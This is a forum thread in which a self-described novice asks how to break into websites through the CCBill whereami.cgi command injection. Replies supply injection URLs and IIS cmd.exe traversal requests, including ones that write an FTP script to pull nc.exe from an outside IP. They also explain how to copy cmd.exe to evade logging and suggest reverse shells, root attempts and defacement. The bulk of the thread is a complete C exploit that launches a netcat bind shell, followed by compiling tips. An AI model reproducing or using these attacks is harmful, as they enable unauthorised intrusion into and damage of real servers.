Hey guys , Im fairly new to exploiting and such, what can I do when I get access to this page

/cgi-bin/whereami.cgi?g=ls

On a website.... It says like DUMP OF Environment Variables and shows all this info about the site/server

I heard you can execute shell commands somehow, Anyone know about this?

vuln is old as shit... im sure you can do it like this:

cgi-bin/whereami.cgi?g=|ls|

or
cgi-bin/whereami.cgi?g=|`ls`|

yea but what does it do

I believe this is used to run commands sort of like SQL Injection techniques. Is that what you are trying to do?

Well im just trying to gain access to the site thru this exploit... but im not sure how I run commands with it , and which commands to run..

Your trying to hack the page.. yay for you

But for learning purposes the whole point is to get past the filters and execute a command the command most likely being a unix command ls is like dir for windows etc
From there you can send a reverse shell to your box and try a local root attempt.
But if you just want to deface the site.. then u can do that with the reverse shell..
i won't go into details you can do some research

Put a pipe and execute commands in bash. Of course you have to know unix.

atomix is right, the exploit is old as shit. having said that, you will VERY occasionally find them. whereami.cgi?g=commands . It is a ccbill script by the way.

Well... You dont necessarily need to know UNiX... im not talking about this specific question of /cgi-bin/whereami.cgi?g=ls i found a hole in another site, where i need to gain shell back to fix something... and i scanned... found "CGi holes"... such as:


/scripts/cmd.exe?/c+dir%20c:\

Now when i exec that, i see the dir of C:\... But i cant seem to do anything else, (ie FTP, mkdir, net start) and i was wondering if there were any possible way to gain a shell from this... Any insights?

you could do ..

/scripts/cmd.exe?/c+echo open 123.123.123.123>ftp.bat

/scripts/cmd.exe?/c+echo username >ftp.bat

/scripts/cmd.exe?/c+echo password>ftp.bat

/scripts/cmd.exe?/c+echo get nc.exe>ftp.bat

then you run :

/scripts/cmd.exe?/c+ftp -s:ftp.bat

and voila nc.exe is downloaded :-)

It seems as tho i can only use "DiR"... I will search around and find a text that i can possibly open, maybe get a login / pw for telnet, and fix my problem :\. Thanks for the help


EXPLOiTED

If you can only DIR, but not exec try to copy the cmd.exe to another one and use this one... by the way all your activity with cmd.exe will be logged...

/scripts/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+low.exe
/scripts/low.exe?/c+........................

the commands you run with low.exe are not logged... and should have exec access...

it is an old sploit, but test it....

/*
* =====================================
* CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
* By: Knight420
* 7/07/03
*
* spawns a shell with netcat and attempts to connect
* into the server on port 6666 to gain access of the
* webserver uid
*
* © COPYRIGHT Blue Ballz , 2003
* all rights reserved
* =====================================
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);

unsigned char ccbill[] =
"GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";

int
main (int argc, char **argv)
{
int socket;
char *TARGET = "TARGET";
char *server;
unsigned short int port;
struct sockaddr_in sa;

if (argc != 3) {
system("clear");
printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
"usage: %s <host> <port>\n");
exit (EXIT_FAILURE);
}
setenv (TARGET, argv[1], 1);
server = argv[1];
port = atoi (argv[2]);

socket = net_connect (&sa, server, port, 35);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}

write (socket, ccbill, strlen (ccbill));
sleep (1);
close (socket);

printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
printf ("[1] evil data sent.\n", server);
printf ("[2] connecting to shell.\n", server);
system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
exit (EXIT_SUCCESS);
}

unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;

i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}

return (i);
}


int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;

/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);

cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}

flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}

error = 0;

n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;

FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;

n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);

if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);

return (fd);
}

that exploit aint a lot of good id the server hasnt got netcat on it

also I doubt you can deface the website since the webscript would be under apache user and would have jack all rights

can someone deliver the compiled version of CCBILL CGI Remote Exploit ?

kieddie

Under windows use Cygwin

gcc -o file.exe file.c

Greetz